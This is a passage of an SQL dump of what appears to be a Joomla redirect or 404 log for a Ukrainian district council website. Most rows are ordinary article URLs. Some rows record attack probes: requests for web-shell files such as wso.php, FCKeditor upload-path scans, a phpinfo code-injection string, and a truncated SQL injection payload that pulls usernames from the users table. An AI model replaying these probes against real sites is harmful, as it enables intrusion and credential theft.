00:00:00',301),(14888,'http://malyn-rayrada.org.ua/apple-app-site-association','','','',2,0,'2015-09-30 03:54:14','0000-00-00 00:00:00',301),(14889,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=787:2012-10-15-09-13-25&lang=uk&option=com_content&view=article','','','',1,0,'2015-09-30 03:55:09','0000-00-00 00:00:00',301),(14890,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1303:2014-04-29-13-13-18&lang=uk&option=com_content&view=article','','','',1,0,'2015-09-30 20:05:13','0000-00-00 00:00:00',301),(14891,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1344:--------25--2013--464-l-----------&lang=uk&option=com_content&view=article','','','',1,0,'2015-09-30 22:03:26','0000-00-00 00:00:00',301),(14892,'http://www.malyn-rayrada.org.ua/wordpress','','','',1,0,'2015-10-01 06:13:43','0000-00-00 00:00:00',301),(14893,'http://www.malyn-rayrada.org.ua/blog','','','',1,0,'2015-10-01 06:13:43','0000-00-00 00:00:00',301),(14894,'http://www.malyn-rayrada.org.ua/images/i.php','','www.malyn-rayrada.org.ua/images/i.php','',1,0,'2015-10-01 10:23:03','0000-00-00 00:00:00',301),(14895,'http://malyn-rayrada.org.ua/x.php','','','',1,0,'2015-10-01 23:44:32','0000-00-00 00:00:00',301),(14896,'http://malyn-rayrada.org.ua/images/j.php','','','',1,0,'2015-10-02 01:26:55','0000-00-00 00:00:00',301),(14897,'http://malyn-rayrada.org.ua/images/post.php','','','',1,0,'2015-10-02 02:56:13','0000-00-00 00:00:00',301),(14898,'http://www.malyn-rayrada.org.ua/x.php','','','',1,0,'2015-10-02 04:07:11','0000-00-00 00:00:00',301),(14899,'http://malyn-rayrada.org.ua/tmp/cache-clean.php','','','',1,0,'2015-10-02 19:31:03','0000-00-00 00:00:00',301),(14900,'http://www.malyn-rayrada.org.ua/index.php/1174-informatsijne-povidomlennya-pro-ogoloshennya-konkursu-z-vidboru-sub-ektiv-diyalnosti-dlya-provedennya-kapitalnikh-remontiv-ob-ektiv-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu?tmpl=component&','','','',1,0,'2015-10-02 20:45:16','0000-00-00 00:00:00',301),(14901,'http://malyn-rayrada.org.ua/php.php','','','',1,0,'2015-10-03 01:42:07','0000-00-00 00:00:00',301),(14902,'http://malyn-rayrada.org.ua/installation/index.php','','','',1,0,'2015-10-03 14:09:03','0000-00-00 00:00:00',301),(14903,'http://malyn-rayrada.org.ua/images/php.php','','','',1,0,'2015-10-03 20:48:58','0000-00-00 00:00:00',301),(14904,'http://malyn-rayrada.org.ua/typo3/index.php','','','',1,0,'2015-10-04 07:42:37','0000-00-00 00:00:00',301),(14905,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=950:2013-03-06-13-10-57&catid=11&Itemid=14&lang=uk','','','',2,0,'2015-10-05 03:40:47','0000-00-00 00:00:00',301),(14906,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=851:-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2015-10-05 03:46:35','0000-00-00 00:00:00',301),(14907,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=764:2012-09-26-12-58-07&catid=11&Itemid=14&lang=uk','','','',1,0,'2015-10-05 04:05:56','0000-00-00 00:00:00',301),(14908,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&lang=en&Itemid=0','','','',1,0,'2015-10-05 07:27:45','0000-00-00 00:00:00',301),(14909,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&lang=ru&Itemid=0','','','',1,0,'2015-10-05 07:27:47','0000-00-00 00:00:00',301),(14910,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11&lang=ru&Itemid=0','','','',1,0,'2015-10-05 07:29:18','0000-00-00 00:00:00',301),(14911,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11&lang=uk&Itemid=0','','','',1,0,'2015-10-05 07:29:20','0000-00-00 00:00:00',301),(14912,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&lang=ru&Itemid=0','','','',1,0,'2015-10-05 07:29:36','0000-00-00 00:00:00',301),(14913,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&lang=uk&Itemid=0','','','',1,0,'2015-10-05 07:29:40','0000-00-00 00:00:00',301),(14914,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15&lang=en&Itemid=0','','','',1,0,'2015-10-05 07:29:51','0000-00-00 00:00:00',301),(14915,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2015-10-05 07:30:03','0000-00-00 00:00:00',301),(14916,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2015-10-05 07:30:06','0000-00-00 00:00:00',301),(14917,'http://www.malyn-rayrada.org.ua/index.php/1127-urochistosti-ta-svyatkovij-kontsert-do-dnya-medichnogo-pratsivnika?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-05 07:39:05','0000-00-00 00:00:00',301),(14918,'http://malyn-rayrada.org.ua/images/cache.php','','','',1,0,'2015-10-05 21:47:50','0000-00-00 00:00:00',301),(14919,'http://malyn-rayrada.org.ua/images/maink.php','','','',5,0,'2015-10-09 15:49:21','0000-00-00 00:00:00',301),(14920,'http://malyn-rayrada.org.ua/images/i.php','','','',1,0,'2015-10-10 00:02:39','0000-00-00 00:00:00',301),(14921,'http://www.malyn-rayrada.org.ua/FCK/','','','',4,0,'2015-10-10 17:18:13','0000-00-00 00:00:00',301),(14922,'http://www.malyn-rayrada.org.ua/FCKeditor/','','','',4,0,'2015-10-10 17:18:13','0000-00-00 00:00:00',301),(14923,'http://www.malyn-rayrada.org.ua/admin/fck/','','','',2,0,'2015-10-10 17:18:13','0000-00-00 00:00:00',301),(14924,'http://www.malyn-rayrada.org.ua/admin/fckeditor/','','','',2,0,'2015-10-10 17:18:14','0000-00-00 00:00:00',301),(14925,'http://www.malyn-rayrada.org.ua/ckeditor/','','','',2,0,'2015-10-10 17:18:15','0000-00-00 00:00:00',301),(14926,'http://www.malyn-rayrada.org.ua/common/fckeditor/','','','',2,0,'2015-10-10 17:18:16','0000-00-00 00:00:00',301),(14927,'http://www.malyn-rayrada.org.ua/editor/','','','',2,0,'2015-10-10 17:18:17','0000-00-00 00:00:00',301),(14928,'http://www.malyn-rayrada.org.ua/editor/fckeditor/','','','',2,0,'2015-10-10 17:18:17','0000-00-00 00:00:00',301),(14929,'http://www.malyn-rayrada.org.ua/editor1/','','','',2,0,'2015-10-10 17:18:18','0000-00-00 00:00:00',301),(14930,'http://www.malyn-rayrada.org.ua/editorold/','','','',2,0,'2015-10-10 17:18:19','0000-00-00 00:00:00',301),(14931,'http://www.malyn-rayrada.org.ua/fckimg/','','','',2,0,'2015-10-10 17:18:19','0000-00-00 00:00:00',301),(14932,'http://www.malyn-rayrada.org.ua/images/upload/FCKeditor/','','','',2,0,'2015-10-10 17:18:20','0000-00-00 00:00:00',301),(14933,'http://www.malyn-rayrada.org.ua/images/upload/fckediter/','','','',2,0,'2015-10-10 17:18:21','0000-00-00 00:00:00',301),(14934,'http://www.malyn-rayrada.org.ua/images/upload/fckimg/','','','',2,0,'2015-10-10 17:18:22','0000-00-00 00:00:00',301),(14935,'http://www.malyn-rayrada.org.ua/inc/fckeditor/','','','',2,0,'2015-10-10 17:18:24','0000-00-00 00:00:00',301),(14936,'http://www.malyn-rayrada.org.ua/include/fckeditor/','','','',2,0,'2015-10-10 17:18:25','0000-00-00 00:00:00',301),(14937,'http://www.malyn-rayrada.org.ua/includes/fckeditor/','','','',2,0,'2015-10-10 17:18:26','0000-00-00 00:00:00',301),(14938,'http://www.malyn-rayrada.org.ua/js/fckeditor/','','','',2,0,'2015-10-10 17:18:27','0000-00-00 00:00:00',301),(14939,'http://www.malyn-rayrada.org.ua/manage/fckeditor/','','','',2,0,'2015-10-10 17:18:28','0000-00-00 00:00:00',301),(14940,'http://www.malyn-rayrada.org.ua/scripts/fckeditor/','','','',2,0,'2015-10-10 17:18:30','0000-00-00 00:00:00',301),(14941,'http://www.malyn-rayrada.org.ua/sysadmin/fckeditor/','','','',2,0,'2015-10-10 17:18:31','0000-00-00 00:00:00',301),(14942,'http://www.malyn-rayrada.org.ua/system/fckeditor/','','','',2,0,'2015-10-10 17:18:33','0000-00-00 00:00:00',301),(14943,'http://www.malyn-rayrada.org.ua/upload/FCKeditor/','','','',2,0,'2015-10-10 17:18:34','0000-00-00 00:00:00',301),(14944,'http://www.malyn-rayrada.org.ua/upload/fckediter/','','','',2,0,'2015-10-10 17:18:35','0000-00-00 00:00:00',301),(14945,'http://malyn-rayrada.org.ua/media/login.php?login=cmd','','','',1,0,'2015-10-11 01:20:52','0000-00-00 00:00:00',301),(14946,'http://www.malyn-rayrada.org.ua/index.php?Itemid&lang=ru&option=com_phocagallery&view=categories','','http://go.mail.ru/search_images','',2,0,'2015-10-11 05:25:37','0000-00-00 00:00:00',301),(14947,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1072:-24-6-&lang=en&option=com_content&view=article','','http://go.mail.ru/search_images','',1,0,'2015-10-11 14:36:35','0000-00-00 00:00:00',301),(14948,'http://malyn-rayrada.org.ua/modules/mod_araticlhess1/mod_araticlhess1.php','','','',3,0,'2015-10-11 16:19:21','0000-00-00 00:00:00',301),(14949,'http://malyn-rayrada.org.ua/modules/mod_xsystem/mod_xsystem.php','','','',3,0,'2015-10-11 16:19:21','0000-00-00 00:00:00',301),(14950,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1360:-qq&lang=en&option=com_content&view=article','','http://go.mail.ru/search_images','',2,0,'2015-10-11 18:35:21','0000-00-00 00:00:00',301),(14951,'http://malyn-rayrada.org.ua/images/images.php','','','',4,0,'2015-10-12 12:48:39','0000-00-00 00:00:00',301),(14952,'http://malyn-rayrada.org.ua/templates/beez/index.php','','','',4,0,'2015-10-12 12:48:41','0000-00-00 00:00:00',301),(14953,'http://malyn-rayrada.org.ua/tmp/tmp.php','','','',3,0,'2015-10-13 08:30:02','0000-00-00 00:00:00',301),(14954,'http://malyn-rayrada.org.ua/tmp/wso2.php','','','',3,0,'2015-10-13 08:30:03','0000-00-00 00:00:00',301),(14955,'http://malyn-rayrada.org.ua/images/image.php','','','',3,0,'2015-10-13 10:42:23','0000-00-00 00:00:00',301),(14956,'http://malyn-rayrada.org.ua/tmp/wso.php','','','',3,0,'2015-10-13 10:42:24','0000-00-00 00:00:00',301),(14957,'http://malyn-rayrada.org.ua/tmp/img.php','','','',3,0,'2015-10-13 10:42:24','0000-00-00 00:00:00',301),(14958,'http://www.malyn-rayrada.org.ua/attachments/article/1036/Телефонні гарячі лінії ор','','http://www.malyn-rayrada.org.ua/','',1,0,'2015-10-13 11:35:37','0000-00-00 00:00:00',301),(14959,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1315:-31-6-&lang=en&option=com_content&view=article','','http://go.mail.ru/search_images','',1,0,'2015-10-14 22:04:57','0000-00-00 00:00:00',301),(14960,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1043:-------2013-&lang=uk&option=com_content&view=article','','','',4,0,'2015-10-15 11:32:23','0000-00-00 00:00:00',301),(14961,'http://malyn-rayrada.org.ua/modules/mod_araticlasic/mod_araticlasic.php','','','',1,0,'2015-10-16 09:59:48','0000-00-00 00:00:00',301),(14962,'http://malyn-rayrada.org.ua/modules/mod_arateiclws/mod_arateiclws.php','','','',1,0,'2015-10-16 09:59:48','0000-00-00 00:00:00',301),(14963,'http://malyn-rayrada.org.ua/modules/mod_ariimageslider/mod_ariimageslider.php','','','',3,0,'2015-10-16 09:59:48','0000-00-00 00:00:00',301),(14964,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=948:-2012-&lang=uk&option=com_content&view=article','','','',1,0,'2015-10-17 18:12:34','0000-00-00 00:00:00',301),(14965,'http://malyn-rayrada.org.ua/index.php?option=com_simpleimageupload&view=upload&tmpl=component','','','',1,0,'2015-10-17 18:42:22','0000-00-00 00:00:00',301),(14966,'http://malyn-rayrada.org.ua/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','','','',3,0,'2015-10-17 18:42:25','0000-00-00 00:00:00',301),(14967,'http://malyn-rayrada.org.ua/ke88s.php','','','',1,0,'2015-10-17 18:45:22','0000-00-00 00:00:00',301),(14968,'http://www.malyn-rayrada.org.ua/index.php/module/aciton/param1/${@phpinfo()}','','http://www.malyn-rayrada.org.ua','',1,0,'2015-10-18 00:05:10','0000-00-00 00:00:00',301),(14969,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1264:2014-04-01-11-27-13&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=16&lang=en','','','',2,0,'2015-10-19 12:53:18','0000-00-00 00:00:00',301),(14970,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1220:2014-02-21-15-56-19&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=16&lang=en','','','',1,0,'2015-10-19 12:53:22','0000-00-00 00:00:00',301),(14971,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1234:2014-03-04-09-59-46&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=16&lang=en','','','',1,0,'2015-10-19 12:59:02','0000-00-00 00:00:00',301),(14972,'http://malyn-rayrada.org.ua/index.php/component/user/?task=register','','http://malyn-rayrada.org.ua/index.php?option=com_user&view=register','',1,0,'2015-10-26 13:49:56','0000-00-00 00:00:00',301),(14973,'http://www.malyn-rayrada.org.ua/in','','','',2,0,'2015-10-26 20:03:43','0000-00-00 00:00:00',301),(14974,'http://www.malyn-rayrada.org.ua/i','','','',2,0,'2015-10-26 21:54:56','0000-00-00 00:00:00',301),(14975,'http://malyn-rayrada.org.ua/attachments/389_reiting.pdf','','','',1,0,'2015-10-30 04:43:46','0000-00-00 00:00:00',301),(14976,'http://malyn-rayrada.org.ua/index.php?option=com_contenthistory&view=history&item_id=1&type_id=1&list[ordering]&list[select]=(select 1 from (select count(*),concat((select username from #__users limit 0,1),floor(rand(0)*2)) from information_schema.tables ','','','',1,0,'2015-10-30 06:26:24','0000-00-00 00:00:00',301),(14977,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/938-pro-nadannya-dozvolu-komunalnij-ustanovi-malinskij-rajonnij-trudovij-arkhiv-na-prijnyattya-dokumentiv','','','',23,0,'2015-10-30 09:01:28','0000-00-00 00:00:00',301),(14978,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11&lang=uk&Itemid=','','','',8,0,'2015-10-30 09:03:27','0000-00-00 00:00:00',301),(14979,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/63-rishennya-vid-17-09-2014-roku/867-pro-vnesennya-zmin-do-rishennya-rajonnoji-radi-vid-15-grudnya-2010-roku-12-pro-utvorennya-prezidiji-rajonnoji-radi','','','',1,0,'2015-10-30 09:03:39','0000-00-00 00:00:00',301),(14980,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-?start=7','','','',7,0,'2015-10-30 09:04:15','0000-00-00 00:00:00',301),(14981,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/696-pro-zatverdzhennja-ugodi-pro-spilne-finansuvannja','','','',45,0,'2015-10-30 09:04:55','0000-00-00 00:00:00',301),(14982,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/966-pro-zvernennya-do-prezidenta-ukrajini-golovi-verkhovnoji-radi-ukrajini-prem-er-ministra-ukrajini-shchodo-zberezhennya-4-ji-zoni-posilenogo-radiologichnogo','','','',1,0,'2015-10-30 09:05:19','0000-00-00 00:00:00',301),(14983,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011','','','',31,0,'2015-10-30 09:06:25','0000-00-00 00:00:00',301),(14984,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1150-dibrivska-silska-rada-informue','','','',27,0,'2015-10-30 09:12:07','0000-00-00 00:00:00',301),(14985,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-','','','',32,0,'2015-10-30 09:13:04','0000-00-00 00:00:00',301),(14986,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/73-pro-obrannja-golovi-rajonnoi-radi','','http://www.yandex.ua/clck/jsredir?from=www.yandex.ua%3Bsearch%2F%3Bweb%3B%3B&text=&etext=856.LR0Us5W3IkTDnWQzJ1fAipvhidV3su3TjqaMvjujR_4nels_cFjb7JOG4','',86,0,'2015-10-30 09:17:02','0000-00-00 00:00:00',301),(14987,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1143-chopovitska-selishchna-rada-informue-pro-zatverdzhennya-polozhennya','','','',51,0,'2015-10-30 09:17:29','0000-00-00 00:00:00',301),(14988,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-','','','',32,0,'2015-10-30 09:21:05','0000-00-00 00:00:00',301),(14989,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-','','','',36,0,'2015-10-30 09:21:43','0000-00-00 00:00:00',301),(14990,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1153-novovorobjivska-silska-rada-informue','','','',66,0,'2015-10-30 09:22:11','0000-00-00 00:00:00',301),(14991,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/823-pro-pripinennja-kontraktu-z-kerivnikom-kp','','','',22,0,'2015-10-30 09:22:36','0000-00-00 00:00:00',301),(14992,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1098-pro-zvernennya-do-derzhavnoji-finansovoji-inspektsiji-v-zhitomirskij-oblasti-shchodo-vklyuchennya-malinskogo-rajonu-v-plan-kompleksnikh-perevirok-na-2015','','','',1,0,'2015-10-30 09:22:53','0000-00-00 00:00:00',301),(14993,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=51&Itemid=92&lang=uk&limitstart=10','','','',7,0,'2015-10-30 09:23:15','0000-00-00 00:00:00',301),(14994,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1047-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-shcho-peredaetsya-v-orendu-gr-shtulyu-valeriyu-grigorov','','','',1,0,'2015-10-30 09:23:32','0000-00-00 00:00:00',301),(14995,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=88&lang=en&limitstart=10','','','',6,0,'2015-10-30 09:23:50','0000-00-00 00:00:00',301),(14996,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-','','','',32,0,'2015-10-30 09:24:02','0000-00-00 00:00:00',301),(14997,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-','','','',43,0,'2015-10-30 09:24:15','0000-00-00 00:00:00',301),(14998,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=89&lang=en','','','',5,0,'2015-10-30 09:25:39','0000-00-00 00:00:00',301),(14999,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-','','','',34,0,'2015-10-30 09:26:01','0000-00-00 00:00:00',301),(15000,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/262-pro-rozgljad-protestu-prokurora-malinskogo-rajonu_2','','','',12,0,'2015-10-30 09:26:08','0000-00-00 00:00:00',301),(15001,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012','','','',33,0,'2015-10-30 09:27:34','0000-00-00 00:00:00',301),(15002,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11&lang=ru','','','',9,0,'2015-10-30 09:27:39','0000-00-00 00:00:00',301),(15003,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1167-pro-zatverdzhennya-tekhnichnikh-dokumentatsij-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnikh-dilyanok-silskogospodarskogo-priznachennya-derzhavnoji-vlasnosti-z-metoyu-','','','',1,0,'2015-10-30 09:31:07','0000-00-00 00:00:00',301),(15004,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-?start=14','','','',28,0,'2015-10-30 09:35:19','0000-00-00 00:00:00',301),(15005,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012?start=7','','','',20,0,'2015-10-30 09:35:34','0000-00-00 00:00:00',301),(15006,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-','','','',46,0,'2015-10-30 09:35:42','0000-00-00 00:00:00',301),(15007,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-','','','',36,0,'2015-10-30 09:37:11','0000-00-00 00:00:00',301),(15008,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1060-pro-zvernennya-do-derzhavnogo-agentstva-avtomobilnikh-dorig-ukrajini','','','',20,0,'2015-10-30 09:38:37','0000-00-00 00:00:00',301),(15009,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-','','','',52,0,'2015-10-30 09:40:13','0000-00-00 00:00:00',301),(15010,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/228-pro-hid-vikonannja-rajonnoi-kompleksnoi-programi_4','','','',25,0,'2015-10-30 09:43:48','0000-00-00 00:00:00',301),(15011,'http://malyn-rayrada.org.ua/index.php/--19072013-/551-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_10','','','',4,0,'2015-10-30 09:43:51','0000-00-00 00:00:00',301),(15012,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-','','','',57,0,'2015-10-30 09:44:19','0000-00-00 00:00:00',301),(15013,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?start=28','','','',33,0,'2015-10-30 09:44:25','0000-00-00 00:00:00',301),(15014,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-','','','',31,0,'2015-10-30 09:44:32','0000-00-00 00:00:00',301),(15015,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku','','','',27,0,'2015-10-30 09:47:17','0000-00-00 00:00:00',301),(15016,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-02-2015-roku','','http://r.search.yahoo.com/_ylt=A7x9UnmbPDNWFmoA_ir3yAt.;_ylu=X3oDMTBzMzNtZTdsBHNlYwNzcgRwb3MDNDkEY29sbwNpcjIEdnRpZAM-/RV=2/RE=1446227228/RO=10/RU=http','',28,0,'2015-10-30 09:47:23','0000-00-00 00:00:00',301),(15017,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/514-pro-zatverdzhennja-rezultativ-aukcionnih-torgiv-z','','','',10,0,'2015-10-30 09:47:25','0000-00-00 00:00:00',301),(15018,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku','','','',31,0,'2015-10-30 09:47:30','0000-00-00 00:00:00',301),(15019,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30122010-','','','',40,0,'2015-10-30 09:48:26','0000-00-00 00:00:00',301),(15020,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=59&Itemid=107&lang=uk&limitstart=5','','','',12,0,'2015-10-30 09:49:45','0000-00-00 00:00:00',301),(15021,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1061-pro-zvernennya-do-prem-er-ministra-ukrajini-shchodo-vstanovlennya-pilgovikh-tarifiv-na-prirodnij-gaz-ta-elektroenergiyu-dlya-naselennya-yake-prozhivae-v-','','','',1,0,'2015-10-30 09:53:34','0000-00-00 00:00:00',301),(15022,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--27042012-','','','',26,0,'2015-10-30 09:53:50','0000-00-00 00:00:00',301),(15023,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16082013-','','','',27,0,'2015-10-30 09:54:00','0000-00-00 00:00:00',301),(15024,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1161-pro-zatverdzhennya-rajonnoji-programi-zabezpechennya-provedennya-protiepizootichnikh-zakhodiv-u-malinskomu-rajoni-na-2015-2017-roki','','','',98,0,'2015-10-30 09:54:24','0000-00-00 00:00:00',301),(15025,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-','','','',82,0,'2015-10-30 09:55:10','0000-00-00 00:00:00',301),(15026,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-','','','',35,0,'2015-10-30 09:55:46','0000-00-00 00:00:00',301),(15027,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-','','','',35,0,'2015-10-30 09:55:52','0000-00-00 00:00:00',301),(15028,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-','','','',56,0,'2015-10-30 09:55:58','0000-00-00 00:00:00',301),(15029,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12092012-','','','',96,0,'2015-10-30 09:56:03','0000-00-00 00:00:00',301),(15030,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-','','','',29,0,'2015-10-30 09:56:05','0000-00-00 00:00:00',301),(15031,'http://www.malyn-rayrada.org.ua/index.php/--29112013-/661-pro-priznachennja-direktora-komunalnogo','','','',6,0,'2015-10-30 10:05:48','0000-00-00 00:00:00',301),(15032,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/869-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',59,0,'2015-10-30 10:05:49','0000-00-00 00:00:00',301),(15033,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-?start=10','','','',11,0,'2015-10-30 10:06:36','0000-00-00 00:00:00',301),(15034,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-?start=20','','','',8,0,'2015-10-30 10:06:40','0000-00-00 00:00:00',301),(15035,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1167-pro-zatverdzhennya-tekhnichnikh-dokumentatsij-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnikh-dilyanok-silskog','','','',1,0,'2015-10-30 10:09:04','0000-00-00 00:00:00',301),(15036,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1163-pro-peredachu-primishchennya-lyubovitskoji-zosh-i-ii-stupeniv-u-komunalnu-vlasnist-teritorialnoji-gromadi-lyubovitskoji-silskoji-radi','','','',42,0,'2015-10-30 10:11:40','0000-00-00 00:00:00',301),(15037,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1160-pro-vnesennya-zmin-do-rishennya-rajonnoji-radi-vid-16-11-2010r-5-pro-utvorennya-postijnikh-komisij-rajonnoji-radi-zatverdzhennya-jikh-skladu-ta-obrannya-goliv-komisij','','','',12,0,'2015-10-30 10:12:20','0000-00-00 00:00:00',301),(15038,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/618-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_13','','','',9,0,'2015-10-30 10:14:26','0000-00-00 00:00:00',301),(15039,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/937-pro-zatverdzhennya-pereliku-ob-ektiv-shcho-pidlyagayut-privatizatsiji-u-2014-2015-rokakh','','','',23,0,'2015-10-30 10:28:21','0000-00-00 00:00:00',301),(15040,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-','','','',37,0,'2015-10-30 10:34:16','0000-00-00 